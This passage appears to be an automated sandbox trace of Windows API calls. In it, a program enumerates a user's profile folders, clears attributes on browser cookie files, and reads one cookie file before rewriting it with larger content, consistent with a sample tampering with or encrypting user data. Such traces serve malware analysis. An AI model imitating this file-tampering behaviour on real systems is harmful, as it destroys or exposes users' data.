nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0093.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.910] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.910] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e87ab80, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e87ab80, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x75cc2be0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x75cc2be0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xd1762d60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1762d60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e803170, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x794f55f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0093.911] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 0 [0093.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e87ab80, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e87ab80, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x75cc2be0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x75cc2be0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xd1762d60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1762d60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7951b750, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e803170, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x794f55f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0093.912] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0093.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0093.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.913] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.913] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x664d55e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0093.913] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76abed20, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x199, dwReserved0=0x0, dwReserved1=0x0, cFileName="keecfmwgj@login.microsoftonline[2].txt", cAlternateFileName="KE130F~1.TXT")) returned 1 [0093.913] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76a4c900, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76a4c900, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76a4c900, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="keecfmwgj@microsoft[2].txt", cAlternateFileName="KEECFM~4.TXT")) returned 1 [0093.913] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x765178e0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76a4c900, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76a4c900, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0x0, dwReserved1=0x0, cFileName="keecfmwgj@support.microsoft[2].txt", cAlternateFileName="KEECFM~2.TXT")) returned 1 [0093.913] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x765178e0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x765178e0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x765178e0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0x0, dwReserved1=0x0, cFileName="keecfmwgj@support.microsoft[3].txt", cAlternateFileName="KEECFM~3.TXT")) returned 1 [0093.913] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7cda41d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0093.913] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7cda41d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0093.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.913] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", dwFileAttributes=0x80) returned 1 [0093.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0093.914] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat"), fInfoLevelId=0x0, lpFileInformation=0x2451e40 | out: lpFileInformation=0x2451e40*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x664d55e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0093.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0093.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0093.914] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff [0093.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23b228) returned 1 [0093.930] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt", dwFileAttributes=0x80) returned 1 [0093.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0093.933] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@login.microsoftonline[2].txt"), fInfoLevelId=0x0, lpFileInformation=0x2452a88 | out: lpFileInformation=0x2452a88*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x76abed20, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x76abed20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x76abed20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x199)) returned 1 [0093.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0093.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0093.933] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@login.microsoftonline[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0093.933] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x199 [0093.933] ReadFile (in: hFile=0x250, lpBuffer=0x2452fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2452fb8*, lpNumberOfBytesRead=0x23e958*=0x199, lpOverlapped=0x0) returned 1 [0093.999] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt", nBufferLength=0x105, lpBuffer=0x23e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt", lpFilePart=0x0) returned 0x63 [0093.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0093.999] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\keecfmwgj@login.microsoftonline[2].txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.000] GetFileType (hFile=0x250) returned 0x1 [0094.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0094.000] GetFileType (hFile=0x250) returned 0x1 [0094.001] WriteFile (in: hFile=0x250, lpBuffer=0x24d1338*, nNumberOfBytesToWrite=0x2f4, lpNumberOfBytesWritten=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x24d1338*, lpNumberOfBytesWritten=0x23e818*=0x2f4, lpOverlapped=0x0) returned 1 [0094.002] CloseHandle (hObject=0x250) returned 1 [0094.003] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt", nBufferLength=0x105, lpBuffer=0x23e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\keecfmwgj@login.microsoftonline[2].txt", lpFilePart=0x0) returned 0x63 [0094.003] 